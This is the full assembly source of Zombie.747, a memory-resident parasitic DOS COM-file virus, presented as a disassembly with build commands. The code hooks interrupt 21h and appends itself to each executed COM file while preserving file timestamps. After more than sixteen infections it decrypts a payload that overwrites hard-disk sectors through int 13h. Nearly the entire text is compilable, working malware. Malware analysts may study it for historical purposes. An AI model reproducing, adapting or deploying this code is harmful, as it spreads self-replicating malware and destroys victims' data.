Zombie Disassembly by Darkman/29A Zombie.747 is a 747 bytes parasitic resident COM virus. Infects files at load and execute program, except COMMAND.COM, by appending the virus to the infected COM file. To compile Zombie.747 with Turbo Assembler v 4.0 type: TASM /M ZOMBI747.ASM TLINK /t /x ZOMBI747.OBJ .model tiny .code org 100h ; Origin of Zombie.747 code_begin: call crypt_virus nop nop nop nop nop virus_begin: call delta_offset delta_offset: pop bp ; Load BP from stack sub bp,03h ; BP = delta offset jmp virus_begin_ stack_end: stack_ db 7ah dup(?) ; Stack stack_begin: int21_addr dd ? ; Address of interrupt 21h virus_seg dw ? ; Segment of virus stack_seg dw ? ; Stack segment stack_ptr dw ? ; Stack pointer infect_off dw offset infect_file-offset virus_begin infect_mark db 04h dup(?) ; infection mark infect_count dw ? ; Infection counter virus_offset equ word ptr $+01h ; Offset of virus infect_code db 0e9h,?,? ; JMP imm16 (opcode 0e9h) origin_code db 0cdh,20h,? ; Original code of infected file code_begin_ dw 100h ; Offset of beginning of code int21_virus proc near ; Interrupt 21h of Zombie.747 pushf ; Save flags at stack cmp ax,4b00h ; Load and execute program? je load_and_exe ; Equal? Jump to load_and_exe cmp ax,4b69h ; Zombie.747 function? je virus_functi ; Equal? Jump to virus_functi popf ; Load flags from stack jmp dword ptr cs:[offset int21_addr-offset virus_begin] endp virus_functi: mov bx,ax ; Already resident popf ; Load flags from stack iret ; Interrupt return! load_and_exe: mov cs:[offset infect_off-offset virus_begin],offset infect_file-offset virus_begin call setup_stack popf ; Load flags from stack jmp dword ptr cs:[offset int21_addr-offset virus_begin] setup_stack proc near ; Setup stack of the virus mov cs:[offset stack_seg-offset virus_begin],ss mov cs:[offset stack_ptr-offset virus_begin],sp mov ss,cs:[offset virus_seg-offset virus_begin] mov sp,offset stack_begin-offset virus_begin push ax bx cx dx es ds si di bp call cs:[offset infect_off-offset virus_begin] cmp word ptr cs:[offset infect_count-offset virus_begin],10h jbe load_stack ; Below or equal? Jump to load_stack call payload load_stack: pop bp di si ds es dx cx bx ax mov ss,cs:[offset stack_seg-offset virus_begin] mov sp,cs:[offset stack_ptr-offset virus_begin] ret ; Return! endp payload proc near ; Payload of the virus mov si,offset crypt_begin-offset virus_begin mov cx,(crypt_end-crypt_begin) decrypt_loop: not byte ptr [si] ; Decrypt a byte inc si ; Increase index register loop decrypt_loop crypt_begin: mov ax,303h ; Write disk sector(s) db 31h,0dbh ; XOR BX,BX mov es,bx ; ES:BX = pointer to data buffer mov cx,02h ; CX = sector- and cylinder number mov dx,80h ; DX = drive- and head number int 13h crypt_end: mov si,offset crypt_begin-offset virus_begin mov cx,(crypt_end-crypt_begin) encrypt_loop: not byte ptr [si] ; Encrypt a byte inc si ; Increase index register loop encrypt_loop ret ; Return! endp examine_file proc near ; Examine file cld ; Clear direction flag find_dot: lodsb ; AL = byte of filename cmp al,'.' ; Found the dot in the filename je examine_fil_ ; Equal? Jump to examine_fil_ or al,al ; End of filename? loopnz find_dot ; Not zero? Jump to find_dot jz examine_exit ; Zero? Jump to examine_exit examine_fil_: mov ax,[si-06h] ; AX = word of filename or ax,2020h ; Lowcase word of filename cmp ax,'mm' ; COMMAND.COM? je examine_exit ; Equal? Jump to examine_exit lodsw ; AX = word of extension or ax,2020h ; Lowcase word of extension cmp ax,'oc' ; Correct extension? jne examine_exit ; Not equal? Jump to examine_exit lodsb ; AL = byte of extension or al,20h ; Lowcase byte of extension cmp al,'m' ; Correct extension? jne examine_exit ; Not equal? Jump to examine_exit clc ; Clear carry flag ret ; Return! examine_exit: stc ; Set carry flag ret ; Return! endp set_file_pos proc near ; Set current file position xor cx,cx ; Zero CX or dx,dx ; Zero DX? jns set_file_po_ ; Positive? Jump to set_file_po_ not cx ; Invert each bit of low-order wor... set_file_po_: mov ah,42h ; Set current file position int 21h ret ; Return! endp infect_file proc near ; Infect COM file mov si,dx ; SI = offset of filename call examine_file jnc open_file ; No error? Jump to open_file jmp infect_exit_ open_file: mov ax,3d02h ; Open file (read/write) int 21h jnc read_file ; No error? Jump to read_file jmp infect_exit_ read_file: mov bx,ax ; BX = file handle mov dx,cs ; DX = code segment mov ds,dx ; DS " " " mov ah,3fh ; Read from file mov cx,03h ; Read three bytes mov dx,offset origin_code-offset virus_begin int 21h jnc examine_mark ; No error? Jump to examine_mark jmp close_file examine_mark: mov dx,-28h ; DX = low-order word of offset fr... mov al,02h ; Set current file position (EOF) call set_file_pos jc close_file ; Error? Jump to close_file nop nop nop mov ah,3fh ; Read from file mov cx,04h ; Read four bytes mov dx,offset infect_mark-offset virus_begin int 21h jc close_file ; Error? Jump to close_file nop nop nop cmp word ptr ds:[offset infect_mark-offset virus_begin],'oZ' jne calc_offset ; Not equal? Jump to calc_offset nop nop nop cmp word ptr ds:[offset infect_mark+02h-offset virus_begin],'bm' je close_file ; Previosly infected? Jump to clos... nop nop nop calc_offset: xor dx,dx ; Zero DX mov al,02h ; Set current file position (EOF) call set_file_pos jc close_file ; Error? Jump to close_file nop nop nop sub ax,03h ; AX = offset of virus mov ds:[offset virus_offset-offset virus_begin],ax mov ax,5700h ; Get file's date and time int 21h push cx dx ; Save registers at stack mov ah,40h ; Write to file mov cx,(code_end-virus_begin) xor dx,dx ; Zero DX int 21h jc infect_exit ; Error? Jump to infect_exit nop nop nop cmp cx,ax ; Written all of the virus? jne infect_exit ; Not equal? Jump to infect_exit nop nop nop mov al,00h ; Set current file position (SOF) xor dx,dx ; Zero DX call set_file_pos jc infect_exit ; Error? Jump to infect_exit nop nop nop mov ah,40h ; Write to file mov cx,03h ; Write three bytes mov dx,offset infect_code-offset virus_begin int 21h jc infect_exit ; Error? Jump to infect_exit nop nop nop infect_exit: inc word ptr cs:[offset infect_count-offset virus_begin] mov ax,5701h ; Set file's date and time pop dx cx ; Load registers from stack int 21h close_file: mov ah,3eh ; Close file int 21h infect_exit_: ret ; Return! endp get_psp_own proc near ; Get PSP segment of owner or spec... mov ah,52h ; Get list of lists int 21h mov bx,es:[bx-02h] ; BX = segment of first memory con... mov es,bx ; ES = " " " " " mov bx,es:[01h] ; BX = PSP segment of owner or spe... ret ; Return! endp allocate_mem proc near ; Allocate memory push es ; Save ES at stack mov ax,cs ; AX = segment of PSP for current ... dec ax ; AX = segment of Memory Control B... mov es, ax ; ES = " " " " " mov bx,es:[03h] ; BX = size of memory block in par... pop es ; Load ES from stack sub bx,cx ; Subtract number of paragraphs to... dec bx ; BX = new size in paragraphs mov ah,4ah ; Resize memory block int 21h jc allocat_exit ; Error? Jump to allocat_exit nop nop nop mov ah,48h ; Allocate memory mov bx,cx ; BX = number of paragraphs to all... int 21h jc allocat_exit ; Error? Jump to allocat_exit nop nop nop push ax ; Save AX at stack dec ax ; AX = segment of Memory Control B... mov es,ax ; ES = " " " " " push es ; Save ES at stack call get_psp_own pop es ; Load ES from stack mov es:[01h],bx ; Store PSP segment of owner or sp... pop es ; Load ES from stack clc ; Clear carry flag allocat_exit: ret ; Return! endp virus_begin_: mov ax,4b69h ; Zombie.747 function xor bx,bx ; Zero BX int 21h cmp bx,4b69h ; Already resident? je virus_exit ; Equal? Jump to virus_exit nop nop nop mov cx,(data_end-virus_begin+0fh)/10h call allocate_mem jc virus_exit ; Error? Jump to virus_exit nop nop nop mov si,bp ; SI = delta offset xor di,di ; Zero DI mov cx,(code_end-virus_begin) cld ; Clear direction flag rep movsb ; Move virus to top of memory mov es:[offset virus_seg-offset virus_begin],es push es ; Save ES at stack mov ax,3521h ; Get interrupt vector 21h int 21h mov dx,es ; DX = segment of interrupt 21h pop es ; Load ES from stack mov word ptr es:[offset int21_addr-offset virus_begin],bx mov word ptr es:[offset int21_addr+02h-offset virus_begin],dx mov ax,2521h ; Set interrupt vector 21h push es ; Save ES at stack pop ds ; Load DS from stack (ES) mov dx,offset int21_virus-offset virus_begin int 21h virus_exit: mov ax,cs ; AX = segment of PSP for current ... mov ds,ax ; DS = " " " " " " mov es,ax ; ES = " " " " " " lea si,origin_code ; SI = offset of origin_code sub si,offset virus_begin add si,bp ; Add delta offset to offset of co... mov di,100h ; DI = offset of beginning of code mov cx,03h ; Move three bytes cld ; Clear direction flag rep movsb ; Move the original code to beginning lea bx,code_begin_ ; BX = offset of code_begin_ sub bx,offset virus_begin add bx,bp ; Add delta offset to offset of co... jmp [bx] db 'Zombie - Danish woodoo hackers (14AUG91)' code_end: data_end: crypt_virus proc ; Encrypt payload of the virus lea si,crypt_begin ; SI = offset of crypt_begin mov cx,(crypt_end-crypt_begin) crypt_loop: not byte ptr [si] ; Encrypt a byte inc si ; Increase index register loop crypt_loop ret ; Return! endp end code_begin